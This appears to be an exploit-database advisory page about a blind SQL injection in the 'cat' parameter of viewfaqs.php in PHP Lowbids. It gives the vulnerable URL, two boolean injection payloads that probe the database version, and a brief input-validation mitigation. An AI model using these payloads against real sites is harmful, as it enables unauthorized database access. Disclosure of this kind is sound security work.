header-logo
Suggest Exploit
vendor:
PHP Lowbids
by:
BorN To K!LL - h4ck3r
8.8
CVSS
HIGH
Blind-Injection
89
CWE
Product Name: PHP Lowbids
Affected Version From: n/a
Affected Version To: n/a
Patch Exists: NO
Related CWE: n/a
CPE: n/a
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: n/a
n/a

PHP Lowbids

The vulnerability exists in the viewfaqs.php file, which allows an attacker to inject malicious SQL queries into the application. The attacker can use the substring() function to check the version of the database and extract information from the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in an SQL query.
Source

Exploit-DB raw data:

==
[+]Script: PHP Lowbids
[+]Version: n/a
[+]Link: http://phplowbids.com
==
[+]Author: BorN To K!LL - h4ck3r
[+]Contact: SQL@hotmail.co.uk
==
[+]3xploit:
/viewfaqs.php?cat=[Blind-Injection]

[+]3xample:
/viewfaqs.php?cat=1 and substring(version(),1,1)=4               // true
/viewfaqs.php?cat=1 and substring(version(),1,1)=5               // false

==
[+]Greetings:
darkc0de team, AsbMay's group, w4ck1ng team , and "Kuwaitis"
==